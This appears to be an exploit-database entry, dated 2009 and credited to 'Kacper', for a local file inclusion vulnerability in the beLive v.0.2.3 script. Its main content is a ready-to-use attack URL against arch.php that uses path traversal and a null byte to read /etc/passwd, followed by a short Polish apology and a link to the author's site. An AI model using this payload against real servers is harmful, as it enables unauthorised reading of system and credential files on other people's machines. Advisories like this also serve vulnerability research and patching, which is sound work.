id: 5180
date: 05/13/2009
title: beLive v.0.2.3 (arch.php arch) Local File Inclusion Vulnerability
author: Kacper
cves: 

=================================================================
beLive v.0.2.3 (arch.php arch) Local File Inclusion Vulnerability
=================================================================


Author: Kacper

---------------

Script: beLive version: v.0.2.3

Vuln:
http://[page].pl/belive/arch.php?arch=../../../../../../../../etc/passwd%00

sorry ze tak malo napisane ale nie bylo czasu, wiecej na http://devilteam.pl/

THE END

-----------------------------------------



#  0day.today [2023-03-22]  #